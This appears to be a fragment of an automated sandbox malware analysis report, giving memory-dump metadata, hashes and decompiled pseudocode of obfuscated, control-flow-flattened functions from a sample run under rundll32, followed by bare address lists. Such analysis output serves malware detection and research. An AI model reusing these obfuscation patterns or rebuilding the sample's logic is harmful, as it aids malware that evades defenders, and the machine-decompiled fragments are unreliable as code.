                                                                                                                          • String ID: =.SG$]O+
                                                                                                                          • API String ID: 0-348654084
                                                                                                                          • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                          • Instruction ID: b3c280fc341761f5376a9cbf3fb6e460f1e4de5e39216b399ede4d7ed358cceb
                                                                                                                          • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                          • Instruction Fuzzy Hash: B621277180120DEFCF45DFE4DA4A4AEBBB1FF45304F108559E91562225C3759B24DFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 431132790-0
                                                                                                                          • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                          • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                          • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                          • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 97%
                                                                                                                          			E007A044F() {
                                                                                                                          				signed int _v4;
                                                                                                                          				signed int _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				intOrPtr _v16;
                                                                                                                          				char _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				signed int _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				signed int _v140;
                                                                                                                          				void* _t309;
                                                                                                                          				intOrPtr _t310;
                                                                                                                          				void* _t311;
                                                                                                                          				intOrPtr _t321;
                                                                                                                          				intOrPtr _t325;
                                                                                                                          				void* _t329;
                                                                                                                          				signed int _t331;
                                                                                                                          				signed int _t332;
                                                                                                                          				signed int _t333;
                                                                                                                          				signed int _t334;
                                                                                                                          				signed int _t335;
                                                                                                                          				signed int _t336;
                                                                                                                          				signed int _t337;
                                                                                                                          				signed int _t338;
                                                                                                                          				signed int _t339;
                                                                                                                          				intOrPtr _t369;
                                                                                                                          				void* _t373;
                                                                                                                          				intOrPtr _t374;
                                                                                                                          				void* _t379;
                                                                                                                          				signed int* _t383;
                                                                                                                          
                                                                                                                          				_t383 =  &_v140;
                                                                                                                          				_v16 = 0x8f0e94;
                                                                                                                          				_v12 = 0x9bdfd3;
                                                                                                                          				_t329 = 0;
                                                                                                                          				_v8 = _v8 & 0;
                                                                                                                          				_v4 = _v4 & 0;
                                                                                                                          				_v68 = 0xf0a33d;
                                                                                                                          				_v68 = _v68 ^ 0x64690d06;
                                                                                                                          				_v68 = _v68 >> 7;
                                                                                                                          				_v68 = _v68 ^ 0x00c9335c;
                                                                                                                          				_v96 = 0x45a6c;
                                                                                                                          				_v96 = _v96 + 0xffff2947;
                                                                                                                          				_v96 = _v96 >> 0x10;
                                                                                                                          				_v96 = _v96 ^ 0x00000003;
                                                                                                                          				_v56 = 0xab09eb;
                                                                                                                          				_v56 = _v56 | 0x7e070137;
                                                                                                                          				_v56 = _v56 ^ 0x7eaf09ff;
                                                                                                                          				_v80 = 0xa0f766;
                                                                                                                          				_v80 = _v80 | 0xafeefcb7;
                                                                                                                          				_v80 = _v80 ^ 0xafeefff7;
                                                                                                                          				_v48 = 0xf26de0;
                                                                                                                          				_v48 = _v48 + 0xffff1ff1;
                                                                                                                          				_v48 = _v48 ^ 0x00f18dd1;
                                                                                                                          				_v76 = 0x20d89d;
                                                                                                                          				_v76 = _v76 + 0xffff51c8;
                                                                                                                          				_v76 = _v76 | 0xd50d8457;
                                                                                                                          				_v76 = _v76 ^ 0xd52cfd33;
                                                                                                                          				_v136 = 0x1fce72;
                                                                                                                          				_v136 = _v136 >> 0xe;
                                                                                                                          				_v136 = _v136 | 0xd51e44d2;
                                                                                                                          				_t331 = 7;
                                                                                                                          				_v136 = _v136 / _t331;
                                                                                                                          				_v136 = _v136 ^ 0x1e7b1fff;
                                                                                                                          				_t379 = 0x1e2498b;
                                                                                                                          				_v92 = 0x2fa0bb;
                                                                                                                          				_v92 = _v92 >> 7;
                                                                                                                          				_v92 = _v92 << 1;
                                                                                                                          				_v92 = _v92 ^ 0x0000a534;
                                                                                                                          				_v52 = 0x3913b;
                                                                                                                          				_t332 = 0x4f;
                                                                                                                          				_v52 = _v52 / _t332;
                                                                                                                          				_v52 = _v52 ^ 0x00068b65;
                                                                                                                          				_v104 = 0xfffd78;
                                                                                                                          				_v104 = _v104 | 0x3b05e9e1;
                                                                                                                          				_v104 = _v104 + 0x741e;
                                                                                                                          				_v104 = _v104 ^ 0x7591a7da;
                                                                                                                          				_v104 = _v104 ^ 0x4990882f;
                                                                                                                          				_v84 = 0xe3d15a;
                                                                                                                          				_v84 = _v84 << 8;
                                                                                                                          				_v84 = _v84 ^ 0xbeb387df;
                                                                                                                          				_v84 = _v84 ^ 0x5d62ae1e;
                                                                                                                          				_v24 = 0xb3d42d;
                                                                                                                          				_v24 = _v24 | 0x6ee5a57e;
                                                                                                                          				_v24 = _v24 ^ 0x6efe8c67;
                                                                                                                          				_v60 = 0x6708ad;
                                                                                                                          				_v60 = _v60 + 0xd3fd;
                                                                                                                          				_v60 = _v60 ^ 0x0061923e;
                                                                                                                          				_v128 = 0x5551d4;
                                                                                                                          				_t333 = 0x50;
                                                                                                                          				_v128 = _v128 / _t333;
                                                                                                                          				_t334 = 0x7a;
                                                                                                                          				_v128 = _v128 / _t334;
                                                                                                                          				_t335 = 0x7e;
                                                                                                                          				_v128 = _v128 * 0x46;
                                                                                                                          				_v128 = _v128 ^ 0x000c63e9;
                                                                                                                          				_v28 = 0xd668f8;
                                                                                                                          				_v28 = _v28 << 0x10;
                                                                                                                          				_v28 = _v28 ^ 0x68f34519;
                                                                                                                          				_v112 = 0x194a18;
                                                                                                                          				_v112 = _v112 / _t335;
                                                                                                                          				_v112 = _v112 | 0xa7c33fbe;
                                                                                                                          				_t336 = 0x65;
                                                                                                                          				_v112 = _v112 / _t336;
                                                                                                                          				_v112 = _v112 ^ 0x01a285cf;
                                                                                                                          				_v44 = 0xc79794;
                                                                                                                          				_v44 = _v44 ^ 0x35aba003;
                                                                                                                          				_v44 = _v44 ^ 0x356e5b19;
                                                                                                                          				_v140 = 0x380362;
                                                                                                                          				_t337 = 0x79;
                                                                                                                          				_v140 = _v140 * 5;
                                                                                                                          				_v140 = _v140 ^ 0x1d7b2daf;
                                                                                                                          				_v140 = _v140 + 0x590f;
                                                                                                                          				_v140 = _v140 ^ 0x1c6cd8ab;
                                                                                                                          				_v120 = 0x1c8328;
                                                                                                                          				_v120 = _v120 / _t337;
                                                                                                                          				_t338 = 0xa;
                                                                                                                          				_v120 = _v120 / _t338;
                                                                                                                          				_v120 = _v120 | 0x9d020d0f;
                                                                                                                          				_v120 = _v120 ^ 0x9d02076d;
                                                                                                                          				_v124 = 0x55cbd6;
                                                                                                                          				_v124 = _v124 >> 9;
                                                                                                                          				_v124 = _v124 >> 0xc;
                                                                                                                          				_v124 = _v124 >> 6;
                                                                                                                          				_v124 = _v124 ^ 0x000fb83a;
                                                                                                                          				_v132 = 0xf0ac8c;
                                                                                                                          				_v132 = _v132 | 0x3804c269;
                                                                                                                          				_v132 = _v132 >> 1;
                                                                                                                          				_v132 = _v132 + 0xffff8da8;
                                                                                                                          				_v132 = _v132 ^ 0x1c781e64;
                                                                                                                          				_v88 = 0x7992e8;
                                                                                                                          				_v88 = _v88 | 0xba3027fa;
                                                                                                                          				_v88 = _v88 >> 9;
                                                                                                                          				_v88 = _v88 ^ 0x0051fda0;
                                                                                                                          				_v36 = 0x7aefbd;
                                                                                                                          				_v36 = _v36 + 0xfffff4eb;
                                                                                                                          				_v36 = _v36 ^ 0x0078a7fc;
                                                                                                                          				_v40 = 0xf56b46;
                                                                                                                          				_v40 = _v40 + 0xffff9ce0;
                                                                                                                          				_v40 = _v40 ^ 0x00fe48d4;
                                                                                                                          				_v108 = 0x27569f;
                                                                                                                          				_v108 = _v108 + 0x2c0a;
                                                                                                                          				_v108 = _v108 ^ 0xb442ac8c;
                                                                                                                          				_v108 = _v108 ^ 0xdc856b2a;
                                                                                                                          				_v108 = _v108 ^ 0x68e3c0da;
                                                                                                                          				_v116 = 0xbcba21;
                                                                                                                          				_v116 = _v116 << 0xd;
                                                                                                                          				_v116 = _v116 << 8;
                                                                                                                          				_v116 = _v116 >> 6;
                                                                                                                          				_v116 = _v116 ^ 0x011b605a;
                                                                                                                          				_v32 = 0x87c31e;
                                                                                                                          				_v32 = _v32 ^ 0x05bc26b1;
                                                                                                                          				_v32 = _v32 ^ 0x05363b16;
                                                                                                                          				_v100 = 0x4be1cd;
                                                                                                                          				_v100 = _v100 + 0xffff13dd;
                                                                                                                          				_v100 = _v100 | 0xdbf19b4f;
                                                                                                                          				_v100 = _v100 >> 7;
                                                                                                                          				_v100 = _v100 ^ 0x01b90151;
                                                                                                                          				_v64 = 0xb1223e;
                                                                                                                          				_v64 = _v64 | 0xb1fef6fe;
                                                                                                                          				_v64 = _v64 ^ 0xb1f65c82;
                                                                                                                          				_v72 = 0x9ef2a7;
                                                                                                                          				_v72 = _v72 * 0x66;
                                                                                                                          				_v72 = _v72 + 0xffffefd1;
                                                                                                                          				_v72 = _v72 ^ 0x3f51caaf;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					while(1) {
                                                                                                                          						_t309 = 0x546d98;
                                                                                                                          						do {
                                                                                                                          							L3:
                                                                                                                          							if(_t379 == _t309) {
                                                                                                                          								_t310 =  *0x7b3e00; // 0x0
                                                                                                                          								_t339 = _v56;
                                                                                                                          								_t311 = E007A0DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
                                                                                                                          								_t383 =  &(_t383[6]);
                                                                                                                          								__eflags = _t311 - _v80;
                                                                                                                          								if(__eflags != 0) {
                                                                                                                          									_t379 = 0x64eb485;
                                                                                                                          									goto L14;
                                                                                                                          								} else {
                                                                                                                          									_t379 = 0xb6ab68a;
                                                                                                                          									_t329 = 1;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								if(_t379 == 0x19763e8) {
                                                                                                                          									_push(_v128);
                                                                                                                          									_push(_v60);
                                                                                                                          									__eflags = E00799462(E007ADCF7(_v24, 0x7917f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
                                                                                                                          									_t339 = _v140;
                                                                                                                          									_t379 =  ==  ? 0x546d98 : 0x64eb485;
                                                                                                                          									E0079A8B0(_t339, _t313, _v120);
                                                                                                                          									_t383 =  &(_t383[8]);
                                                                                                                          									L14:
                                                                                                                          									_t369 =  *0x7b3e00; // 0x0
                                                                                                                          									_t309 = 0x546d98;
                                                                                                                          									goto L15;
                                                                                                                          								} else {
                                                                                                                          									if(_t379 == 0x1e2498b) {
                                                                                                                          										_push(_t339);
                                                                                                                          										_push(_t339);
                                                                                                                          										_t373 = 0x28;
                                                                                                                          										_t321 = E00797FF2(_t373);
                                                                                                                          										 *0x7b3e00 = _t321;
                                                                                                                          										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
                                                                                                                          										_t374 =  *0x7b3e00; // 0x0
                                                                                                                          										_t325 = E00797FF2( *((intOrPtr*)(_t374 + 0x14)));
                                                                                                                          										_t369 =  *0x7b3e00; // 0x0
                                                                                                                          										_t379 = 0x19763e8;
                                                                                                                          										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
                                                                                                                          										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
                                                                                                                          										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
                                                                                                                          										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
                                                                                                                          										 *(_t369 + 4) = _t339;
                                                                                                                          										_t309 = 0x546d98;
                                                                                                                          										continue;
                                                                                                                          									} else {
                                                                                                                          										if(_t379 == 0x64eb485) {
                                                                                                                          											E007A8519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
                                                                                                                          											E007A8519(_v64, _v72,  *0x7b3e00);
                                                                                                                          										} else {
                                                                                                                          											if(_t379 != 0xb6ab68a) {
                                                                                                                          												goto L15;
                                                                                                                          											} else {
                                                                                                                          												E0079957D(_v20, _v40, _v108, _v48, _v116);
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          							L18:
                                                                                                                          							return _t329;
                                                                                                                          							L15:
                                                                                                                          							__eflags = _t379 - 0xfde45c5;
                                                                                                                          						} while (__eflags != 0);
                                                                                                                          						goto L18;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}


                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ,
                                                                                                                          • API String ID: 0-2314114710
                                                                                                                          • Opcode ID: 87b68e8b25a5c2f04b065158ac8ad9f442e7e44d23acde0348e24c5cbec69be8
                                                                                                                          • Instruction ID: ddc267cf39e76894258ed361a55de76e8a7d3d41ec78246dd8277eec40d3f885
                                                                                                                          • Opcode Fuzzy Hash: 87b68e8b25a5c2f04b065158ac8ad9f442e7e44d23acde0348e24c5cbec69be8
                                                                                                                          • Instruction Fuzzy Hash: F5E140715083809FD368CF25D58AA0BBBF2BBC5718F608A1DF59A86260C7B5D949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Iconic
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 110040809-0
                                                                                                                          • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                          • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                          • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                          • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E007A9EEC() {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				char _v16;
                                                                                                                          				char _v20;
                                                                                                                          				char _v24;
                                                                                                                          				char _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _t207;
                                                                                                                          				intOrPtr _t209;
                                                                                                                          				intOrPtr _t212;
                                                                                                                          				intOrPtr _t214;
                                                                                                                          				intOrPtr _t218;
                                                                                                                          				void* _t219;
                                                                                                                          				signed int _t221;
                                                                                                                          				signed int _t222;
                                                                                                                          				signed int _t223;
                                                                                                                          				signed int _t224;
                                                                                                                          				signed int _t225;
                                                                                                                          				signed int _t257;
                                                                                                                          				void* _t259;
                                                                                                                          				char _t263;
                                                                                                                          				void* _t264;
                                                                                                                          				void* _t266;
                                                                                                                          
                                                                                                                          				_v64 = 0xd7ee0e;
                                                                                                                          				_t257 = 0x22;
                                                                                                                          				_v64 = _v64 / _t257;
                                                                                                                          				_v64 = _v64 + 0x89a9;
                                                                                                                          				_t219 = 0;
                                                                                                                          				_v64 = _v64 ^ 0x0000b335;
                                                                                                                          				_t259 = 0xb83ebc6;
                                                                                                                          				_v96 = 0xf5dfb6;
                                                                                                                          				_v96 = _v96 >> 6;
                                                                                                                          				_t221 = 0x26;
                                                                                                                          				_v96 = _v96 / _t221;
                                                                                                                          				_t222 = 0x2d;
                                                                                                                          				_v96 = _v96 * 0x58;
                                                                                                                          				_v96 = _v96 ^ 0x000b9251;
                                                                                                                          				_v60 = 0xd70e95;
                                                                                                                          				_v60 = _v60 >> 9;
                                                                                                                          				_v60 = _v60 + 0xffffe8b9;
                                                                                                                          				_v60 = _v60 ^ 0x00062b78;
                                                                                                                          				_v44 = 0xb641ac;
                                                                                                                          				_v44 = _v44 / _t222;
                                                                                                                          				_v44 = _v44 ^ 0x0002d028;
                                                                                                                          				_v52 = 0xbf8457;
                                                                                                                          				_t223 = 0x5d;
                                                                                                                          				_v52 = _v52 / _t223;
                                                                                                                          				_v52 = _v52 | 0xbb7661a2;
                                                                                                                          				_v52 = _v52 ^ 0xbb710206;
                                                                                                                          				_v80 = 0x47b11a;
                                                                                                                          				_v80 = _v80 ^ 0xc2c4229c;
                                                                                                                          				_t224 = 0x18;
                                                                                                                          				_v80 = _v80 / _t224;
                                                                                                                          				_v80 = _v80 + 0xffff1c96;
                                                                                                                          				_v80 = _v80 ^ 0x08184a4c;
                                                                                                                          				_v36 = 0x40dca8;
                                                                                                                          				_v36 = _v36 + 0x3144;
                                                                                                                          				_v36 = _v36 ^ 0x004d2780;
                                                                                                                          				_v40 = 0xec5297;
                                                                                                                          				_v40 = _v40 * 0x45;
                                                                                                                          				_v40 = _v40 ^ 0x3fbac2f2;
                                                                                                                          				_v72 = 0x18b121;
                                                                                                                          				_v72 = _v72 >> 1;
                                                                                                                          				_v72 = _v72 * 0x1e;
                                                                                                                          				_v72 = _v72 + 0xfd79;
                                                                                                                          				_v72 = _v72 ^ 0x0173ec5f;
                                                                                                                          				_v76 = 0xd8cc67;
                                                                                                                          				_v76 = _v76 >> 2;
                                                                                                                          				_v76 = _v76 >> 0xd;
                                                                                                                          				_v76 = _v76 * 0x23;
                                                                                                                          				_v76 = _v76 ^ 0x000d42f3;
                                                                                                                          				_v88 = 0x5f1bd9;
                                                                                                                          				_v88 = _v88 + 0x89b3;
                                                                                                                          				_v88 = _v88 ^ 0xee5f73f3;
                                                                                                                          				_v88 = _v88 ^ 0xfa82a5ad;
                                                                                                                          				_v88 = _v88 ^ 0x14801a76;
                                                                                                                          				_v92 = 0x778c42;
                                                                                                                          				_t225 = 0x6d;
                                                                                                                          				_v92 = _v92 * 0x69;
                                                                                                                          				_v92 = _v92 << 0xb;
                                                                                                                          				_v92 = _v92 | 0xba472be1;
                                                                                                                          				_v92 = _v92 ^ 0xfe7d7315;
                                                                                                                          				_v56 = 0x5dd318;
                                                                                                                          				_v56 = _v56 / _t257;
                                                                                                                          				_v56 = _v56 << 0xc;
                                                                                                                          				_v56 = _v56 ^ 0x2c2721c6;
                                                                                                                          				_v84 = 0xd870dc;
                                                                                                                          				_v84 = _v84 >> 0x10;
                                                                                                                          				_v84 = _v84 | 0x1345b487;
                                                                                                                          				_v84 = _v84 * 0x5a;
                                                                                                                          				_v84 = _v84 ^ 0xc68bf031;
                                                                                                                          				_v48 = 0x9a419e;
                                                                                                                          				_v48 = _v48 | 0xfa3afde2;
                                                                                                                          				_v48 = _v48 ^ 0xfabdbed6;
                                                                                                                          				_v32 = 0x7a1ab;
                                                                                                                          				_v32 = _v32 / _t225;
                                                                                                                          				_v32 = _v32 ^ 0x000f5e95;
                                                                                                                          				_v68 = 0x67bbab;
                                                                                                                          				_v68 = _v68 + 0xffffccf8;
                                                                                                                          				_v68 = _v68 ^ 0x5c1ded32;
                                                                                                                          				_v68 = _v68 << 0xd;
                                                                                                                          				_v68 = _v68 ^ 0x4cb92f41;
                                                                                                                          				_t263 = _v28;
                                                                                                                          				_t258 = _v28;
                                                                                                                          				goto L1;
                                                                                                                          				do {
                                                                                                                          					while(1) {
                                                                                                                          						L1:
                                                                                                                          						_t266 = _t259 - 0xc23b37f;
                                                                                                                          						if(_t266 > 0) {
                                                                                                                          							break;
                                                                                                                          						}
                                                                                                                          						if(_t266 == 0) {
                                                                                                                          							E007A8519(_v56, _v84, _v24);
                                                                                                                          							_t259 = 0xdb1153f;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t259 == 0xab8c2) {
                                                                                                                          							_t209 =  *0x7b3e10; // 0x0
                                                                                                                          							E00798ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
                                                                                                                          							_t212 =  *0x7b3e10; // 0x0
                                                                                                                          							_t234 = _v16;
                                                                                                                          							_t264 = _t264 + 0xc;
                                                                                                                          							_t219 = 1;
                                                                                                                          							_t259 = 0xc23b37f;
                                                                                                                          							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t259 == 0x26dca52) {
                                                                                                                          							_t234 = _v96;
                                                                                                                          							_t214 = E0079A9CE(_v96, _t263,  &_v28, _v60, _v44);
                                                                                                                          							_t258 = _t214;
                                                                                                                          							_t264 = _t264 + 0xc;
                                                                                                                          							if(_t214 == 0) {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							_t259 = 0xe747a68;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t259 == 0xa9b692f) {
                                                                                                                          							_t263 = E0079F899(_t234);
                                                                                                                          							_t259 = 0x26dca52;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          						if(_t259 != 0xb83ebc6) {
                                                                                                                          							goto L21;
                                                                                                                          						} else {
                                                                                                                          							_t259 = 0xa9b692f;
                                                                                                                          							continue;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					if(_t259 == 0xdb1153f) {
                                                                                                                          						E00794E7D(_v48, _v32, _t258, _v68);
                                                                                                                          						_t259 = 0xdb3b1d3;
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          					if(_t259 == 0xe566670) {
                                                                                                                          						_t207 = E007A894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
                                                                                                                          						_t264 = _t264 + 0x10;
                                                                                                                          						asm("sbb esi, esi");
                                                                                                                          						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
                                                                                                                          						goto L1;
                                                                                                                          					}
                                                                                                                          					if(_t259 != 0xe747a68) {
                                                                                                                          						goto L21;
                                                                                                                          					}
                                                                                                                          					_t259 = 0xdb1153f;
                                                                                                                          					if(_v28 > 2) {
                                                                                                                          						_t218 = E00794346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
                                                                                                                          						_v24 = _t218;
                                                                                                                          						_pop(_t234);
                                                                                                                          						if(_t218 != 0) {
                                                                                                                          							_t259 = 0xe566670;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					goto L1;
                                                                                                                          					L21:
                                                                                                                          				} while (_t259 != 0xdb3b1d3);
                                                                                                                          				L22:
                                                                                                                          				return _t219;
                                                                                                                          			}

                                                                                                                          0x007a9ff0
                                                                                                                          0x007a9ff8
                                                                                                                          0x007aa005
                                                                                                                          0x007aa009
                                                                                                                          0x007aa011
                                                                                                                          0x007aa019
                                                                                                                          0x007aa022
                                                                                                                          0x007aa026
                                                                                                                          0x007aa02e
                                                                                                                          0x007aa036
                                                                                                                          0x007aa03e
                                                                                                                          0x007aa043
                                                                                                                          0x007aa04d
                                                                                                                          0x007aa051
                                                                                                                          0x007aa059
                                                                                                                          0x007aa061
                                                                                                                          0x007aa069
                                                                                                                          0x007aa071
                                                                                                                          0x007aa079
                                                                                                                          0x007aa081
                                                                                                                          0x007aa092
                                                                                                                          0x007aa093
                                                                                                                          0x007aa097
                                                                                                                          0x007aa09c
                                                                                                                          0x007aa0a4
                                                                                                                          0x007aa0ac
                                                                                                                          0x007aa0bc
                                                                                                                          0x007aa0c0
                                                                                                                          0x007aa0c5
                                                                                                                          0x007aa0cd
                                                                                                                          0x007aa0d5
                                                                                                                          0x007aa0da
                                                                                                                          0x007aa0e7
                                                                                                                          0x007aa0eb
                                                                                                                          0x007aa0f3
                                                                                                                          0x007aa0fb
                                                                                                                          0x007aa103
                                                                                                                          0x007aa10b
                                                                                                                          0x007aa119
                                                                                                                          0x007aa11d
                                                                                                                          0x007aa125
                                                                                                                          0x007aa12d
                                                                                                                          0x007aa135
                                                                                                                          0x007aa13d
                                                                                                                          0x007aa142
                                                                                                                          0x007aa14a
                                                                                                                          0x007aa14e
                                                                                                                          0x007aa14e
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa152
                                                                                                                          0x007aa158
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa15e
                                                                                                                          0x007aa216
                                                                                                                          0x007aa21c
                                                                                                                          0x00000000
                                                                                                                          0x007aa21c
                                                                                                                          0x007aa16a
                                                                                                                          0x007aa1d5
                                                                                                                          0x007aa1e9
                                                                                                                          0x007aa1ee
                                                                                                                          0x007aa1f5
                                                                                                                          0x007aa1f9
                                                                                                                          0x007aa1fc
                                                                                                                          0x007aa1fd
                                                                                                                          0x007aa202
                                                                                                                          0x00000000
                                                                                                                          0x007aa202
                                                                                                                          0x007aa172
                                                                                                                          0x007aa1af
                                                                                                                          0x007aa1b4
                                                                                                                          0x007aa1b9
                                                                                                                          0x007aa1bb
                                                                                                                          0x007aa1c0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x007aa1c6
                                                                                                                          0x00000000
                                                                                                                          0x007aa1c6
                                                                                                                          0x007aa17a
                                                                                                                          0x007aa198
                                                                                                                          0x007aa19a
                                                                                                                          0x00000000
                                                                                                                          0x007aa19a
                                                                                                                          0x007aa182
                                                                                                                          0x00000000
                                                                                                                          0x007aa188
                                                                                                                          0x007aa188
                                                                                                                          0x00000000
                                                                                                                          0x007aa188
                                                                                                                          0x007aa182
                                                                                                                          0x007aa22c
                                                                                                                          0x007aa2c6
                                                                                                                          0x007aa2cd
                                                                                                                          0x00000000
                                                                                                                          0x007aa2cd
                                                                                                                          0x007aa238
                                                                                                                          0x007aa29a
                                                                                                                          0x007aa29f
                                                                                                                          0x007aa2a6
                                                                                                                          0x007aa2ae
                                                                                                                          0x00000000
                                                                                                                          0x007aa2ae
                                                                                                                          0x007aa240
                                                                                                                          0x00000000
